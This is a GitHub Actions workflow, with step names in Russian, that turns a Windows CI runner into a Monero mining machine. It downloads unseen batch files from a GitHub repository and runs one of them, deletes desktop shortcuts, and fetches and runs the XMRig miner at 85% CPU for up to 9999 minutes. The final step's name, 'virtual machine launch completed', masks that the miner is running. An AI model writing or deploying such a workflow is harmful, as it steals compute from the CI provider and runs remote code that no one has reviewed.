name: launch

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Загрузка необходимого для запуска ПО.
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/MyMonero/main/files/install.bat -OutFile install.bat
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/MyMonero/main/files/exit.bat -OutFile exit.bat
    - name: Настройка VDS.
      run: |
        Remove-item "C:\Users\Public\Desktop\*.lnk" -Force
        cmd /c install.bat
    - name: Запуск Майнера
      run: |
        Invoke-WebRequest https://github.com/ThePyGoose/MyMonero/raw/main/files/xmrig.zip -Outfile xmrig.zip
        Expand-Archive xmrig.zip
        cd xmrig
        cd xmrig
    - name: Запуск виртуальной машины выполнен
      run: ./xmrig.exe --config=config.json --cpu-priority 5 --max-cpu-usage=85
